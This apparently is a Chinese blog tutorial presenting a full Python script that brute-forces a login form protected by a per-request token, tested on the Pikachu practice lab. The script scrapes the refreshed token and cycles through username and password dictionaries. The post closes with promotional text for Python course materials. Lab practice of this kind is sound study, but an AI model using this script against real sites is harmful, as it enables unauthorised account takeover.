Python暴力破解网站登录密码(带token验证)

测试靶机为Pikachu漏洞练习平台暴力破解模块下的 “token防爆破?”

春节期间歇了一阵子,吃睡玩看小说。写这个脚本的起因是因为burp设置带token的暴力破解我只会用pitchfork草叉模式,要是用cluster bomb集束炸弹模式笛卡儿积那样就不会了,所以就干脆把之前写的脚本加了点东西实现这个功能了,到时候有空再学学多线程,爆破速度就更快了。

关键代码解释

设置请求头

5~11行:指定url地址和请求头,user_token设置首次发送请求包时的token值。

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"   user_token = '8680761fe979039a6f836599906'   header = {       'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',       'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'   }

get_token函数获取token值

13~16行:这个函数返回从响应包中获取的token

在http响应包中有一个隐藏的标签里面有token值:

<input type="hidden" name="token" value="5874161fe8db950ca7993759020" />

第15行:soup.select查找标签名为input,name为token的元素的value的值。

def get_token(r):       soup = BeautifulSoup(r.text, 'html.parser')       user_token = soup.select('input[name="token"]')[0]['value']       return user_token

完整代码:

from bs4 import BeautifulSoup   import requests   from requests.models import Response      url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"   user_token = '8680761fe979039a6f836599906'   #proxies = {"http": "http://127.0.0.1:8080"}  # 代理设置,方便burp抓包查看和调试   header = {       'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',       'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'   }      def get_token(r):       soup = BeautifulSoup(r.text, 'html.parser')       user_token = soup.select('input[name="token"]')[0]['value']       return user_token      if __name__ == "__main__":       f = open('result.csv', 'w')     #把爆破结果储存到文件里,这里为csv格式       f.write('用户名' + ',' + '密码' + ',' + '包长度' + '
')    #给文件设置标题          #遍历字典文件,Cluster bomb 暴力破解       for admin in open("C:\Users\admin\Documents\字典\账号.txt"):           for line in open("C:\Users\admin\Documents\字典\密码.txt"):               username = admin.strip()               password = line.strip()               payload = {     #payload为POST的数据                   'username': username,                   'password': password,                   'token': user_token,                   'submit': 'Login'               }                  Response = requests.post(url, data=payload, headers=header)               result = username + ',' + password + ',' + str(len(Response.text))  #用户名密码以及响应包长度                  print(result)           #输出到终端               f.write(result + '
')  #输出到文件               user_token = get_token(Response)    #调用get_token函数获取下一次循环需要的token       print('
---完成---
')       f.close()

运行结果:

查看保存的文件,查看包长度与其他不一样的数据

这里csv不会显示前缀会自动去掉首位0,可以把文件改成txt格式就正常显示了

尝试登陆一下,登录成功。

以上就是“Python暴力破解网站登录密码(带token验证)”的全部内容,希望对你有所帮助。
?
?关于Python技术储备

学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!

一、Python所有方向的学习路线

Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

在这里插入图片描述

二、Python必备开发工具

img

三、Python视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。

img

四、实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。

img

五、Python练习题

检查学习结果。

img

六、面试资料

我们学习Python必然是为了找到高薪的工作,下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料,并且有阿里大佬给出了权威的解答,刷完这一套面试资料相信大家都能找到满意的工作。

img

最后祝大家天天进步!!

上面这份完整版的Python全套学习资料已经上传至CSDN官方,朋友如果需要可以直接微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】。